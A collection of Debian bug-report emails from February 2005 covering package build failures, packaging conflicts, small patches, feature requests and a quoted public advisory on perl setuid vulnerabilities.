Bug#292837: pam: Please use a newer version of Berkeley DB

2005-02-03 Thread Steve Langasek
On Sun, Jan 30, 2005 at 03:34:03PM +0100, Andreas Jochens wrote:
> On 05-Jan-30 05:50, Steve Langasek wrote:
> > Hi Andreas,

> > On Sun, Jan 30, 2005 at 02:12:56PM +0100, Andreas Jochens wrote:
> > > Please reconsider using a newer version of Berkeley DB. The old 'db3' 
> > > version 
> > > has problems on the amd64 and ppc64 architectures.

> > What problems does db3 have on these architectures?

> thank you for your reply!

> The 'db3' package FTBFS on both amd64 and ppc64 for different reasons.

It actually no longer FTBFS on amd64; I was expecting this fix, but didn't
want to comment before I saw the result for myself.

> On ppc64, the 'db3' package does not build at all and I do not know any 
> patch or solution for this. The build stops with the following error 
> which seems to be releated to the use of weak symbols:

> gcc -shared -Wl,-Bsymbolic -Wl,--version-script=Versions  cxx_app.lo 
> cxx_except.lo cxx_lock.lo cxx_log.lo cxx_mpool.lo cxx_table.lo cxx_txn.lo  
> -lstdc++ -L.libs/ -ldb3 -lc  -Wl,-soname -Wl,libdb3_cxx.so.3 -o 
> .libs/libdb3_cxx.so.3.0.2
> /usr/bin/ld: cxx_app.lo(.text+0x330): unresolvable R_PPC64_REL24 relocation 
> against symbol `.__db_real_err@@DB3_2'

Hmm, no insights into that one.  Sounds like one of many reasons to try to
move to db4.2 when possible.

> I am not sure if extra code for automatic upgrades will be necessary
> or even helpful in this case. If I understand it correctly, the 'pam' 
> package does not provide or create any .db database files itself.
> Instead other packages or the system administrator may instruct 'pam'
> to use external .db database files with user data for authentication 
> purposes. It does not seem to be a good idea to automatically change
> such external files. However, I did not look very closely on this and
> I maybe wrong here.

Ah, good point.  In that case, we just have to be able to open those files
in a mode compatible with existing on-disk db3 formats.

Thanks,
-- 
Steve Langasek
postmodern programmer


signature.asc
Description: Digital signature


Bug#293386: wvHtml: confusing error message

2005-02-03 Thread Mikael Sennerholm
Hi!

wvHtml is have a limited user inteface, I think that it need's booth the
output and input file in the same directory. That at least how I'm using
it. 

Sincerely
Mikael

ons 2005-02-02 klockan 22:50 +0100 skrev Michelle Konzack:
> Am 2005-02-02 16:26:44, schrieb Ambrose Li:
> > Package: wv
> > Version: 1.0.2-0.1
> > Severity: normal
> 
> Crazy, I had this problem today too. But under WOODY.
> 
> > $ wvHtml foo.doc  /tmp/x
> > * * * Better to use '--targetdir' for writing in another directory * * *
> > $ wvHtml foo.doc  --targetdir /tmp/x /tmp/x
> > Option '--targetdir' not recognized.
> > $ wvHtml foo.doc  --targetdir=/tmp/x /tmp/x
> > * * * Better to use '--targetdir' for writing in another directory * * *
> > $ wvHtml foo.doc  /tmp/x.html
> > * * * Better to use '--targetdir' for writing in another directory * * *
> > $ wvHtml foo.doc  --targetdir=/tmp/x
> > Usage:  [OPTIONS]  
> 
> It must be "--dir ..." or "-d ..." and it works
> only if the filter is caled from "wvWare"
> 
> > No output is produced in any of the above cases. The manpage would
> > suggest that the 4th command above should work.
> 
> Greetings
> Michelle
> 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293419: squirrelmail-locales: needs Replaces: squirrelmail

2005-02-03 Thread Zed Pobre
Package: squirrelmail-locales
Version: 1.4.4-20050112-1
Severity: normal

Since squirrelmail-locales includes a file owned by a previous version
of squirrelmail, it needs to have a Replaces: squirrelmail line in
order for it to upgrade cleanly.  Currently, it will die with:

Unpacking squirrelmail-locales (from
.../squirrelmail-locales_1.4.4-20050112-1_all.deb) ...
dpkg: error processing 
/var/cache/apt/archives/squirrelmail-locales_1.4.4-20050112-1_all.deb 
(--unpack):
 trying to overwrite
`/usr/share/squirrelmail/locale/ar/LC_MESSAGES/squirrelmail.po', which is also 
in package squirrelmail
dpkg-deb: subprocess paste killed by signal (Broken pipe)


-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (990, 'unstable'), (850, 'unstable'), (400, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.10.erdos
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) (ignored: LC_ALL set to 
en_US)

Versions of packages squirrelmail-locales depends on:
ii  squirrelmail  2:1.4.4-2  Webmail for nuts

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293420: sffview: FTBFS (amd64/gcc-4.0): 'errno' was not declared in this scope

2005-02-03 Thread Andreas Jochens
Package: sffview
Severity: normal
Tags: patch

When building 'sffview' on amd64 with gcc-4.0,
I get the following error:

g++  -O2 -g -c `wx-config --cflags` -o common.o common.cpp
In file included from /usr/include/boost/config.hpp:35,
 from /usr/include/boost/filesystem/config.hpp:18,
 from /usr/include/boost/filesystem/path.hpp:15,
 from common.h:36,
 from common.cpp:35:
/usr/include/boost/config/compiler/gcc.hpp:92:7: warning: #warning "Unknown 
compiler version - please run the configure tests and report the results"
common.cpp: In member function 'virtual void CFile::SetModificationTime(const 
time_t&)':
common.cpp:154: error: 'errno' was not declared in this scope
make[1]: *** [common.o] Error 1
make[1]: Leaving directory `/sffview-0.3'
make: *** [build-stamp] Error 2

With the attached patch 'sffview' can be compiled
on amd64 using gcc-4.0.

Regards
Andreas Jochens

diff -urN ../tmp-orig/sffview-0.3/common.cpp ./common.cpp
--- ../tmp-orig/sffview-0.3/common.cpp  2004-02-29 23:27:56.0 +0100
+++ ./common.cpp2005-02-03 08:31:16.915275759 +0100
@@ -42,6 +42,7 @@
 #endif
 #include 
 #include 
+#include 
 
 #include 
 #include 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293421: Installed size of development package has quadrupled since GTK+ 2.4.14

2005-02-03 Thread Torbjorn.E.Andersson
Package: libgtk2.0-dev
Version: 2.6.1-2
Severity: minor

With the libgtk2.0-dev 2.4.14-2 i386 package the Installed-Size field reads
"8172". With the new libgtk2.0-dev 2.4.6-1 i386 package it reads "35168".
That means the new package is more than four times the size of the old one.

The main difference appears to be in the amount of strippable information
in the object files. I don't know if this really is a bug, and if it is it
could equally well be in the 2.4 packages, but it did strike me as odd.

Sincerely,

Torbjörn Andersson

-- 
Personec AB
Torbjörn Andersson, Systemutvecklare

Phone: +46 (0)533 68 35 75
Fax: +46 (0)533 68 35 33, email: [EMAIL PROTECTED]
www.personec.com
Visiting address: Järnvägsgatan 11
Post address: Järnvägsgatan 11, S-661 31 Säffle, Sweden

Personec: 100% HR
Part of TietoEnator

Please note: The information contained in this message may be legally
privileged and confidential and protected from disclosure. If the reader of
this message is not the intended recipient, you are hereby notified that any
unauthorised use, distribution or copying of this communication is strictly
prohibited. If you have received this communication in error, please notify
us immediately by replying to the message and deleting it from your
computer. Thank you.



Bug#293415: mysql-admin: user accounts display unclear for user@% accounts

2005-02-03 Thread Adam Majer
severity 293415 wishlist
thanks

Hi,

I think this is by design, and I doubt that upstream will fix this. You
actually have

[EMAIL PROTECTED]
  [EMAIL PROTECTED]
  [EMAIL PROTECTED]

The @% part is implied. The first one is the general case and the other
accounts are special cases when connecting from specific hosts. That is,
the parent node is the default, for all hosts not matching the special case.

Changing this to your recommendation would remove that default<->special
case relationship.

If you want, I can still forward it upstream, but this will be a
wishlist bug at best and I doubt that it will be looked at.

- Adam



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293422: debian/dists/stable/Release.gpg uncompatible with gpg 1.0.6

2005-02-03 Thread Robert Bihlmeyer
Package: ftp.debian.org
Severity: wishlist

Stable's Release file can't be checked with the gnupg in stable
(1.0.6-4woody3), as this release does not handle multiple signatures in one
file. My automated checks will break.

Stable clients that verify Release.gpg files will have to install the 2005 key
anyway, as security.debian.org's stable/updates are only signed with this key. 
So I think the signature from the 2004 key can be removed from Release.gpg
without harm ("head -n7").

TIA,
-- 
Robbe


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293423: security bugs (perlsuid & PERLIO_DEBUG: CAN-2005-0155, CAN-2005-0156)

2005-02-03 Thread Christian Hammers
Package: perl
Version: 5.8.4-5
Severity: critical
Tags: security

Hello

Quoting Ubuntu USN-72-1:

===
Ubuntu Security Notice USN-72-1   February 02, 2005
perl vulnerabilities
CAN-2005-0155, CAN-2005-0156
===
...
Two exploitable vulnerabilities involving setuid-enabled perl scripts
have been discovered. The package "perl-suid" provides a wrapper
around perl which allows to use setuid-root perl scripts, i.e.
user-callable Perl scripts which have full root privileges.

Previous versions allowed users to overwrite arbitrary files by
setting the PERLIO_DEBUG environment variable and calling an arbitrary
setuid-root perl script. The file that PERLIO_DEBUG points to was then
overwritten by Perl debug messages. This did not allow precise control
over the file content, but could destroy important data. PERLIO_DEBUG
is now ignored for setuid scripts. (CAN-2005-0155)

In addition, calling a setuid-root perl script with a very long path
caused a buffer overflow if PERLIO_DEBUG was set. This buffer overflow
could be exploited to execute arbitrary files with full root
privileges. (CAN-2005-0156)


bye,

-christian-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#283575: Bug#293342: plib: newer upstream version 1.8.4

2005-02-03 Thread Vassilii Khachaturov
On Wed, 2 Feb 2005, Philipp Frauenfelder wrote:

> Dear Vassilii
>
> Am Wed, Feb 02, 2005 at 06:40:39PM +0200 hat Vassilii Khachaturov getippert:
> > A newer upstream version is available, can you please package it?
>
> Already done.
>
> Regards

Thanks!



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293424: lynx-ssl: doesn't understand xml, -force_html does nothing (in such case)

2005-02-03 Thread Paolo
Package: lynx-ssl
Version: 1:2.8.4.1b-3.1
Severity: important

hello,

I've tried using lynx to browse X Strike Force, ie

Current URL  http://necrotic.deadbeast.net/xsf/XFree86/NEWS.xhtml
Document Typeapplication/xhtml+xml

but lynx always loads such pages as text, piping it to external viewer 
(less), even regardless of -force_html.
Lynx can't be used to browse such sites, whereas eg w3m can. It seems
to suffer same problem as Dillo, ie it doesn't know/handle 
application/xhtml+xml mime-type, but dumping such xml code and renaming
to .html does the trick.


-- 
 paolo
 
 GPG/PGP id:0x21426690 kfp:EDFB 0103 A8D8 4180 8AB5  D59E 9771 0F28 2142 6690
 "Indeed, it does come with warranty: it *will* fail, sometimes, somehow..."
   - software vendor

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux npp 2.4.26-ss-fb-lm287 #1 Fri Jul 16 21:26:09 CEST 2004 i686
Locale: LANG=it_IT, LC_CTYPE="[EMAIL PROTECTED]"

Versions of packages lynx-ssl depends on:
ii  libc6  2.2.5-14.3GNU C Library: Shared libraries an
ii  libncurses55.3.20021109-2Shared libraries for terminal hand
ii  libssl0.9.60.9.6c-2.woody.7  SSL shared libraries
ii  zlib1g 1:1.1.4-1.0woody0 compression library - runtime


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#250531: please remove gcc-3.2 from unstable

2005-02-03 Thread Andreas Barth
* Matthias Klose ([EMAIL PROTECTED]) [050203 08:45]:
> Jeroen van Wolffelaar writes:
> > retitle 250531 RM: gcc-3.2 -- RoM; obsoleted by gcc-3.3
> > tags 250531 moreinfo
> > thanks
> > 
> > What's the status? Any kernels (in sarge?) needing gcc-3.2? Other stuff?

> there is one build dependency left:
> 
> - memtest86. seems the package is replaced by memtest86+.
>   Yann, please could you comment?
> 
> kernels do build depend on gcc272 (2.2.25/m68k,sparc), gcc-2.95
> (2.4.2x/m68k), or else use gcc-3.3 or gcc-3.4.

I was told that a fixed memtest86 was uploaded after yesterdays
cron.daily run and will be installed in unstable tonight.


Cheers,
Andi
-- 
   http://home.arcor.de/andreas-barth/
   PGP 1024/89FB5CE5  DC F1 85 6D A6 45 9C 0F  3B BE F1 D0 C5 D1 D9 0C


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293425: libgtk2-ruby: With new libgtk2.6 there are problems in Gtk::EntryCompletion

2005-02-03 Thread DaVinci
Package: libgtk2-ruby
Version: 0.11.0-3
Severity: important

 It doesn't show completion menu properly when there is more than one
 option and, althought rbbr shows method set_inline_completion, it
 doesn't work.

 Perhaps it is necessary a recompilation, or the new source code from
 CVS that compatibilize libgtk2-ruby with libgtk2.6.

 Greets.

David

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.7
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=UTF-8)

Versions of packages libgtk2-ruby depends on:
ii  libatk1-ruby0.11.0-3 ATK bindings for the Ruby language
ii  libatk1.0-0 1.8.0-4  The ATK accessibility toolkit
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libgdk-pixbuf2-ruby 0.11.0-3 Gdk-Pixbuf 2 bindings for the Ruby
ii  libglib2.0-02.6.1-3  The GLib library of C routines
ii  libgtk2.0-0 2.6.1-2  The GTK+ graphical user interface 
ii  libpango1-ruby  0.11.0-3 Pango bindings for the Ruby langua
ii  libpango1.0-0   1.8.0-3  Layout and rendering of internatio
ii  libruby1.8  1.8.2-2  Libraries necessary to run the Rub

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#291764: non-latin pages need Xprint

2005-02-03 Thread Drew Parsons
You've got to switch Xprint on to print non-latin pages from mozilla.

Drew



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293386: wvHtml: confusing error message

2005-02-03 Thread Michelle Konzack
Am 2005-02-03 08:54:00, schrieb Mikael Sennerholm:
> Hi!
> 
> wvHtml is have a limited user inteface, I think that it need's booth the
> output and input file in the same directory. That at least how I'm using
> it. 

Thats right. 'wvWare' is the Front-End for all the filters.

> Sincerely
> Mikael

Greetings
Michelle

-- 
Linux-User #280138 with the Linux Counter, http://counter.li.org/ 
Michelle Konzack   Apt. 917  ICQ #328449886
   50, rue de Soultz MSM LinuxMichi
0033/3/8845235667100 Strasbourg/France   IRC #Debian (irc.icq.com)


signature.pgp
Description: Digital signature


Bug#293328: Fwd: Bug#293328: qmail-src: use tcpsvd instead of tcpserver

2005-02-03 Thread Gerrit Pape
Hi Jon,

On Wed, Feb 02, 2005 at 10:19:00AM -0600, Jon Marler wrote:
> I received the following wishlist bug today, and really like the idea.
> 
> My thoughts are to change the dependancies to allow ipsvd to be used
> in place of ucspi-tcp and ucspi-tcp-src.
> 
> I'll need to do some "magic" to get the init.d file to work properly,
> but I can just make that a build-time debconf option, or add some
> "intelligence" into the build script.  I'll probably want to add a
> build-dependancy on ipsvd or ucspi-tcp as well to ensure that the
> intelligence works properly.
> 
> Can you think of any other things that I may need to consider?

yes, there's a difference in how ipsvd and tcpserver handle tcp rules
(client based instructions), you cannot use tcpserver's tcp.smtp.cdb
with tcpsvd.

ipsvd instead uses an instructions directory (which optionally can be
compiled into a cdb, but doesn't need to, and the format differs from
tcpserver's cdb).  See http://smarden.org/ipsvd/ipsvd-instruct.5.html
for details, and http://smarden.org/ipsvd/examples.html#instruct for
some examples.

For the qmail-smtp service I would suggest an instructions directory
/etc/qmail/smtp/peers or so, and then starting tcpsvd with the -i
option, e.g.:

 tcpsvd -v -l0 -i/etc/qmail/smtp/peers -c"$MAXSMTPD" -uqmaild \
   0 smtp qmail-smtpd

To allow relaying for 127.0.0.1, do
 echo '+RELAYCLIENT=' >/etc/qmail/smtp/peers/127.0.0.1
 chmod 644 /etc/qmail/smtp/peers/127.0.0.1

See http://smarden.org/ipsvd/ipsvd-cdb.8.html if you want to compile
the instructions directory into a cdb (and then use the -x instead of
the -i option), but I don't think this needs to be the default.

> I don't want to do a complete daemontools packaging, just a
> "drop-in-replacement" of ucspi-tcp.

There's also the runit package in Debian ;-), a kind-of daemontools
replacement.

Regards, Gerrit.
-- 
Open projects at http://smarden.org/pape/.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#287189: reassign initrd-tools

2005-02-03 Thread Thomas Hood
reassign 287189 initrd-tools
thanks

Wolfgang Schnitker wrote:
> When installing a new debian kernel-image mkinitrd looks for /bin/discover
> instead of /usr/bin/discover. Simple symbolic link works. Probably a bug to
> mkinitrd and not for discover, please check out.

The current executables in discover are:

/sbin/discover-modprobe
/bin/discover-static
/usr/bin/discover
/usr/bin/discover-config

In discover1 there is only:

/sbin/discover

Where does the faulty discover command occur?

-- 
Thomas Hood <[EMAIL PROTECTED]>



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293426: viewcvs: split log info from file content so it can be distinguished

2005-02-03 Thread Guillem Jover
Package: viewcvs
Version: 0.9.2+cvs.1.0.dev.2004.07.28-1.4
Severity: wishlist
Tags: patch

Hi,

This trivial patch inserts a line so the log info and the file
content are separated and thus cannot be confused.

regards,
guillem
diff -Naur viewcvs-0.9.2+cvs.1.0.dev.2004.07.28.orig/templates/markup.ezt 
viewcvs-0.9.2+cvs.1.0.dev.2004.07.28/templates/markup.ezt
--- viewcvs-0.9.2+cvs.1.0.dev.2004.07.28.orig/templates/markup.ezt  
2004-07-19 10:49:39.0 +0200
+++ viewcvs-0.9.2+cvs.1.0.dev.2004.07.28/templates/markup.ezt   2005-02-03 
09:49:01.0 +0100
@@ -47,6 +47,8 @@
 [end]
 
 
+
+
 [markup]
 
 [include "include/footer.ezt"]


Bug#292988: gettext dependency on libgcj4 gives buildds the hives

2005-02-03 Thread Santiago Vila
On Thu, 3 Feb 2005, Denis Barbier wrote:

> On Thu, Feb 03, 2005 at 12:09:20AM +0100, Santiago Vila wrote:
> [...]
> > As opposed to po-debconf in debhelper, I do not consider users of
> > msginit to be a minority among the users of gettext. The gettext
> > package is used by programmers (which I think are a minority) and
> > translators (which I think they are the big group of users).
> > As msginit is used by translators, I would much prefer a dependency on
> > "wget | lynx | curl" so that it always work.
> 
> As a translator, I never used it and did not even remember of this
> tool ;)

Ok, assuming that the very first thing people do when something does
not work is to look at the Suggests and Recommends, I'll use a Recommends.

In fact, I have never used that feature as a translator, either.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293349: ITP: libpam-smb -- Pluggable Authentication Module authenticating from NT server

2005-02-03 Thread Steve Langasek
On Wed, Feb 02, 2005 at 05:01:23PM +, Martin Orr wrote:
> Package: wnpp
> Severity: wishlist
> Owner: Martin Orr <[EMAIL PROTECTED]>

>   Package name: libpam-smb
>   Version : 1.9.9+2.0.0-rc6
>   Upstream Author : Dave Airlie <[EMAIL PROTECTED]>
>   URL : http://www.csn.ul.ie/~airlied/pam_smb/
>   License : GPL
>   Description : Pluggable Authentication Module authenticating from NT 
> server

>  This is a PAM module, which can verify user passwords from Windows NT
>  servers.  It differs from winbind in that it does not require you to have
>  administrative access to the NT domain in order to join it, and in that
>  it does not contain an NSS module to obtain user account information from
>  NT - only passwords.

> This package is present in woody (version 1.1.6) but was removed in 2003
> following maintainer inactivity, and because Steve Langasek asserted that it
> was obsolete.  Certainly winbind is to be preferred in most circumstances
> but I at least find this package useful because I am unable to get
> administrative access to the relevant NT domain.

Yes, I still stand by this assessment.  The libpam-smb module offers no
cryptographic trust, and deploying this authentication method instead of
getting approval for a domain join from the admin risks compromising
domain security policies without the admin's approval or awareness.

It's also inherently unreliable.

I don't think this code should be reintroduced to Debian.

-- 
Steve Langasek
postmodern programmer


signature.asc
Description: Digital signature


Bug#273957: min delayed < 1

2005-02-03 Thread Robert Millan
retitle 273957 max delayed > 9 && min delayed == 0
thanks

Hi,

Please also make it accept 0 for minimal value.  tfheen's queue supports this.

As for the maximum value, why imposing an arbitrary restriction?  Just accept
any value as long as the target queue accepts it.

-- 
 .''`.   Proudly running Debian GNU/kFreeBSD unstable/unreleased (on UFS2+S)
: :' :
`. `'http://www.debian.org/ports/kfreebsd-gnu
  `-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293427: file: Magic for LLVM bytecode

2005-02-03 Thread Seo Sanghyeon
Package: file
Version: 4.12-1
Severity: wishlist


It would be nice to recognize LLVM bytecode files. (LLVM is ITP'd
#239415.)

Format (and magic) is documented here:
http://llvm.cs.uiuc.edu/docs/BytecodeFormat.html#signature

My suggested patch:

# LLVM bytecode
0   string  llvmLLVM bytecode, uncompressed
0   string  llvc0   LLVM bytecode, null compressed
0   string  llvc1   LLVM bytecode, gzip compressed
0   string  llvc2   LLVM bytecode, bzip2 compressed

Thanks.

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.9-2-686
Locale: LANG=ko_KR.EUC-KR, LC_CTYPE=ko_KR.EUC-KR (charmap=EUC-KR)

Versions of packages file depends on:
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libmagic1   4.12-1   File type determination library us
ii  zlib1g  1:1.2.2-4compression library - runtime

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293425: libgtk2-ruby: With new libgtk2.6 there are problems in Gtk::EntryCompletion

2005-02-03 Thread Dafydd Harries
Ar 03/02/2005 am 10:12, ysgrifennodd DaVinci:
> Package: libgtk2-ruby
> Version: 0.11.0-3
> Severity: important
> 
>  It doesn't show completion menu properly when there is more than one
>  option and, althought rbbr shows method set_inline_completion, it
>  doesn't work.

Can you be more specific about "doesn't show completion menu properly"?

Does this work with GTK+ 2.4 installed?

>  Perhaps it is necessary a recompilation, or the new source code from
>  CVS that compatibilize libgtk2-ruby with libgtk2.6.

I'm not sure a recompilation will help in this case.

I'm not planning to use code from CVS in order to add GTK 2.6 support.
There will likely be a new upstream release soon, and support for new
widgets will be available then.

-- 
Dafydd


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#286552: Not a bug

2005-02-03 Thread Thomas Hood
> It turns out that this is a problem in discover: more recent versions
> reorder modules such that via-rhine comes after ieee1394 networking,
> making it eth1 instead of eth0, but all that the user sees is that
> networking no longer works.
[...]
> I consider this breakage because it requires /etc/network/interfaces to
> be rewritten for the different eth numbers under different kernels (2.4
> without firewire and orinoco puts the wired NIC at eth0, 2.6 puts it at
> eth2), particularly with static addresses.  A consistent order with say
> all of the hard-wired NICs first, wireless second, and firewire last
> would clear this up.


This is a case of local misconfiguration, not a bug in discover.

There is no guarantee that network interfaces are assigned the same name
by the kernel from occasion to occasion.  The name can be different
after modules are unloaded and reloaded; it can be different after
reboot; it can be different after changing kernel version or discover
version.

It is wrong to expect such a guarantee.  'eth0', etc., are just
temporary handles that allow the same devices to be accessed again and
again so long as they exist.  It happens often to be the case that the
same devices end up getting the same handles on boot but it is wrong to
demand that this always be the case.

If you want a name that is associated always with the same physical
device then use the ifrename utility to create such a name.

-- 
Thomas Hood <[EMAIL PROTECTED]>



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292180: imgseek

2005-02-03 Thread Bartosz Fenski aka fEnIo
On Thu, Feb 03, 2005 at 12:00:02AM +0100, Robert Lemmen wrote:
> hi bartosz,

Hello Robert. 

> i tried to compile your package, but it fails in the same way as on the
> buildd. i modified the except on line 36 in setup.py so that it prints
> the actual exception instead of just complaining, and it goes:
> 
>   /usr/lib/python2.3/site-packages/qt.so: undefined symbol:
>   _ZN16QAssistantClient9qt_invokeEiP8QUObject
> 
> don't really know what to make of it, but perhaps it's a bug in
> python2.3-qt3 and not in your package...

Thanks a lot for your explanation. I'm CCing to python2.3-qt maintainer,
and to my previous bugreport.
I'll also ask upstream for modifications about these exceptions, cause 
without them debugging is quite hard.

> if you want me to try anything just holler!

Thanks. We'll see what will Ricardo say.

regards
fEnIo
-- 
  ,''`.  Bartosz Fenski | mailto:[EMAIL PROTECTED] | pgp:0x13fefc40 | IRC:fEnIo
 : :' :   32-050 Skawina - Glowackiego 3/15 - w. malopolskie - Polska
 `. `'   phone:+48602383548 | proud Debian maintainer and user
   `-  http://skawina.eu.org | JID:[EMAIL PROTECTED] | RLU:172001


signature.asc
Description: Digital signature


Bug#293425: libgtk2-ruby: With new libgtk2.6 there are problems in Gtk::EntryCompletion

2005-02-03 Thread DaVinci
El jueves 03 de febrero, Dafydd Harries escribió:
> >  It doesn't show completion menu properly when there is more than one
> >  option and, althought rbbr shows method set_inline_completion, it
> >  doesn't work.
> 
> Can you be more specific about "doesn't show completion menu properly"?
> 
> Does this work with GTK+ 2.4 installed?

 Yes. It works.

> I'm not planning to use code from CVS in order to add GTK 2.6 support.
> There will likely be a new upstream release soon, and support for new
> widgets will be available then.

 Then we might persuade Masao to release soon ;)

 Greets.

David



Bug#293429: procinfo for kernel v2.6 cpu/disk stats patch

2005-02-03 Thread Arkadi Shishlov
Package: sysutils
Version: 1.3.8.5.1
Severity: important
Tags: patch
Please include this patch into procinfo package - it enables correct 
paging/swap and disk statistics display when running on kernel v2.6 and 
other miscellaneous cpu stats. After patching it works on kernel 2.4 too.
http://www.meisel.cc/software/procinfo19.patch

I also propose additional patch to fix CPU percentage display on kernel 
v2.6 (procinfo -n1). The reason for this is that HZ = 100 but on x86 
intr0 timer ticks at a rate = 1000/s. /proc/uptime has %.2f format so 
precision shouldn't be a problem. Works fine on 2.4.
http://idea.hosting.lv/a/tmp/procinfo-19-elapsed.diff


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Bug#231924: FTBFS: non-PIC in shared lib

2005-02-03 Thread Kurt Roeckx
tags 231924 - fixed
merge 231924 231923
thanks

This doesn't seem like it was fixed and still failed to build in
the same way.

It looks like the --disable-static-modules wasn't used at all.


Kurt



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293432: rhythmbox-applet: FTBFS: cannot stat `./GNOME_Rhythmbox_Applet.server': No such file or directory

2005-02-03 Thread Kurt Roeckx
Package: rhythmbox-applet
Version: 0.1.4.1-1
Severity: serious

Hi,

Your package is failing to build on all 64 bit arches (ia64,
alpha, amd64) with the following error:
 /usr/bin/install -c -m 644 ./GNOME_Rhythmbox_Applet.server 
/build/buildd/rhythmbox-applet-0.1.4.1/debian/rhythmbox-applet//usr/lib/bonobo/servers/GNOME_Rhythmbox_Applet.server
/usr/bin/install: cannot stat `./GNOME_Rhythmbox_Applet.server': No such file 
or directory
make[3]: *** [install-serverDATA] Error 1
make[3]: Leaving directory
`/build/buildd/rhythmbox-applet-0.1.4.1/data'


Kurt



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293430: matrox frame buffer console: mode switching broken

2005-02-03 Thread Mirko Parthey
Package: kernel-image-2.6.8-2-386
Version: 2.6.8-13

When using the Matrox frame buffer driver and switching between consoles
of different resolution, the mode timings get messed up.

How to reproduce the problem:

- if you are still in text mode, load the framebuffer modules:
  # modprobe matroxfb_base; modprobe fbcon

- set a higher resolution mode on the first console only
  (this is my custom mode, I will show the timings below)
  # fbset 1024x640-85
  # fbset
  mode "1024x640-85"
  # D: 77.682 MHz, H: 57.119 kHz, V: 84.999 Hz
  geometry 1024 640 1024 1600 8
  timings 12873 168 56 28 1 112 3
  accel true
  rgba 8/0,8/0,8/0,0/0
  endmode

- switch to another console: press +  

- switch back to console 1: press +

- you will see the following output:
  matroxfb: cannot set xres to 1400, rounded up to 1664
  matroxfb: cannot set xres to 1400, rounded up to 1664
  matroxfb: cannot set xres to 1400, rounded up to 1664
  matroxfb: cannot set xres to 1600, rounded up to 1664
  matroxfb: cannot set xres to 1600, rounded up to 1664
  matroxfb: cannot set xres to 1600, rounded up to 1664
  matroxfb: cannot set xres to 1600, rounded up to 1664
  matroxfb: cannot set xres to 1800, rounded up to 1920
  matroxfb: cannot set xres to 1800, rounded up to 1920

- The image looks interlaced, and indeed it is.
  The timings and geometry have also changed:
  # fbset
  mode "1024x768-87"
  # D: 44.901 MHz, H: 35.523 kHz, V: 86.960 Hz
  geometry 1024 768 1024 768 8
  timings 22271 56 24 33 8 160 8
  laced true
  accel true
  rgba 8/0,8/0,8/0,0/0
  endmode

This bug is fixed in kernel-image-2.6.10-1-386, Version 2.6.10-4.  It
would be nice to have the fix in 2.6.8 too, which is supposed to ship
with sarge.

Mirko


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293431: mysql-dfsg-4.1 fails to build with MySQLFS enabled

2005-02-03 Thread Max Kellermann
Package: mysql-dfsg-4.1
Version: 4.1.9-1

The rules file tries to enable MySQLFS by specifying
--with-mysqlfs. When I tried to build the package on my machine, this
resulted in an error:

checking if we should build MySQLFS... yes
[...]
